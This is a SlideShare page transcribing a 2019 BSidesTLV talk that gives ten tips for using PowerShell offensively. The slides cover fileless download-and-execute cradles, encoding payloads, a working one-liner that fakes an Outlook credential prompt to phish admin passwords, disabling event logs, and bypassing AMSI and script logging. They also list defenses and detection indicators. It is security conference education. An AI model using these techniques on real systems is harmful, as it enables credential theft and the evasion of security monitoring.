Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Powershell-hacking-Y1nTh35h311-BSidesTLV2019

279 views

Published on

My talk on 10 tips for PowerShell as a hacking tool @ BsidesTLV 2019 - Session code on https://github.com/YossiSassi/PowerShell-Hacking-BSidesTLV

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Powershell-hacking-Y1nTh35h311-BSidesTLV2019

  1. 1. Powershell as a hacking tool 2019 Yossi Sassi White h^t ha‫כ‬ker & InfoSec Researcher yossi_sassi
  2. 2. Whoami Y1nTh35h3ll • ~30 years of keyboard access & guitar playing • Researcher, White h^t hacker (Finance, Military/Gov) • Co-Founder @ CyberArt, Board Member @ Javelin Networks • AD Protector, Pow3r5he11 consultant/trainer, CISSP, etc…
  3. 3. What we’ll talk about • 10 tips (out of gazillion..) for PS for hackers • Some of our cool research ;)
  4. 4. What is PowerShell? • Perceived as “MS shell for IT/Sys admins” –For hackers it’s a totally different story ;) • CMD « on steroids » • Windows LoTL heaven • Ideal for post-exploitation • Runs on Windows/Linux/MacOS, open source • Based on .net fx, works with objects
  5. 5. 1. Invoke/Execute any text stream • Run in-memory without touching disk (fileless) • IE (non visible) • msxml2 • Net.WebClient • Invoke-WebRequest (aliases: curl, wget, iwr)
  6. 6. 2. Harness the power of .Net • [Net.WebUtility]::UrlEncode("/insider profiles/") • ("heLlo wOrld").ToCharArray() | % { [char]::IsUpper($_)} • [convert]::ToBase64String($([System.Text.Enc oding]::Unicode.GetBytes("shutdown /r /t 0")))
  7. 7. 3. Convert any to any • Xml, json, html, bytes, whatever. • Export/Import, ConvertTo/From
  8. 8. 4. Phish admin creds one-liner • $c = $Host.ui.PromptForCredential("Microsoft Outlook","Please enter your credentials","$env:userdomain$env:username","") • Can expand it to Windows.Security.Credentials.UI (See @Dviros CredLeaker)
  9. 9. Under the .net framework hood…
  10. 10. 5. There is no spoon… • Powershell.exe is just a spoon. System.management.automation runs the show • Run Powershell (code) without PowerShell(.exe) • Run Powershell from binary without running the binary process
  11. 11. 6. Run C# directly, local & remote • Add-Type • Utilize $using, ${function:functionName} to deliver ANY local variables & functions to remote sessions
  12. 12. 7. Get Objects from apps/scripts • Convert any string output to customized objects –Intuitive, no RegEx • In-mem (on the fly) or template file
  13. 13. 8. Multiple encodings, Compression, Buffers, Threads, ShellCode… • Prepare advanced payloads • Investigate PowerShell attacks
  14. 14. But.. What about PowerShell defenses?? • Execution Policies (Signed Scripts) • Script Block Logging • Module Logging • Transcriptions • ConstrainedLanguage • Protected Event Logging * • + AMSI
  15. 15. 9. (Un)Protected Event Logging • Think “ransomware” for event logs ;) • Leverage PS defense w/CMS for the Red team
  16. 16. 10. Total bypass of PS defenses • Based on research by Omer Yair & team – Bypass AMSI / Logging / Auditing with Invisi-Shell • Does not require administrative privileges(!) – ICLRProfiling::AttachProfiler() – COR_PROFILER_PATH environment variable • Gets JIT-ed code address • Hooks powershell (system.management.automation), hooks system.core.dll, hooks all calls to AMSI – No hook functions – simple replace with RET opcode • Detaches after hooks are placed
  17. 17. Key Takeaways • PowerShell Rocks! • PS Blue Team defenses exist – Use/Loose PS v2.0 wherever possible • Or use invisi-Shell – Obfuscate vs. Look for potentially malicious activity (IEX, .DownloadString, TOKEN_ADJUST_PRIVILEGES etc) • For Windows + Automation = ultimate choice – Writing payloads is fun! And robust. – Multiple powershell offensive frameworks can be found online
  18. 18. Links & THANKS! – Dor Amit (co-founder @ CyberArtSecurity.com) – Omer Yair (EndPoint Team Lead @ Symantec TDAD) – Team @ Javelin Networks (nowadays Symantec TDAD) – Omer’s talk in last DerbyCon • https://www.youtube.com/watch?v=Y3oMEiySxcc • … CHECK HIM OUT this upcoming DefCon @ main stage ! • https://github.com/YossiSassi
  19. 19. T.hanks! Yossi_Sassi

×